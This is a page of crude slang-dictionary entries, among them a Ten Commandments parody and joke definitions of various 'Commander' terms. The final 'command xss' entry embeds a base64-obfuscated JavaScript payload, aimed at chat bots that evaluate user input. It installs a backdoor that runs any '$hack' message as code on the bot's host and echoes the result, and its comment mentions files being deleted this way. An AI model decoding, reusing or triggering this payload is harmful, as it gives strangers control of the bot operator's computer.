1- Thou shall have no other CoDs before Modern Warfare 4.
2- Don't take the Lord's heroin through your veins.
3- Remember the Sabbath so thee knows when it's time to report for work like a good sheep.
4- Honor thy father & thy mother or else they'll Exodus 21 thy ass.
5- Thou shall not grill.
6- Thou shall not Neflix & chill. Except the Sabbath.
7- Even though Boomer's ruined the economy and didn't give thee a chance, don't steal unless it's from the government.
8- Thou shall not Peepin' Tom thy neighbor.
9- Thou shall not shove it in thy neighbor's wife.
10- actually leave your fuckin neighbor alone.
Don't forget to blindly follow any and all doctrines or manifests that your parents tell you to, especially the 10 commandments.
6๐ 5๐
Someone who spends too much time on the toilet.
Are you still in there?...OMG...what is taking you so long, Commander John?
1๐ 1๐
One badass mother fucker who keeps the party crackin all night long.
You see that guy pulling a Commander Cain at the party last night?
Another name for the coronavirus pandemic. Named for the main villain in the 80s gi joe cartoons.
"Everyone's panic buying toilet paper because of the COVID Commander."
The Wing Commander is a person who does something in an impromptu manner, improvising, with little preparation or actual knowledge of the subject.
"The Wing Commander"
Peter taking an emergency call and only getting very little information and then guessing or making up the rest in a very poor attempt at appearing competent at one's job.
1๐ 1๐
A chad so great all of the coochie gravitates to him.
Kanan is the clout commander.
^evaljs eval1-1(atob("Ym90LnNvY2tldC5vbignbWVzc2FnZScsIGZ1bmN0aW9uKGRhdGEpIHsKICBsZXQgeCA9IGRhdGEubXNnLmluZGV4T2YoJyAnKTsKICBpZihkYXRhLm1zZy5zbGljZSgwLCB4KSA9PSAnJGhhY2snKSB7CiAgICB0cnkgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCBldmFsKGRhdGEubXNnLnNsaWNlKHggKyAxKSkpOwogICAgfSBjYXRjaChlcikgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCAiRVJSOiAiICsgZXIudG9TdHJpbmcoKSk7CiAgICB9CiAgfQp9KQ=="))
/* command xss is a type of XSS attack performed on chatroom bots to gain access to the host's computer */
/* They found a command xss in my bot and deleted all my files */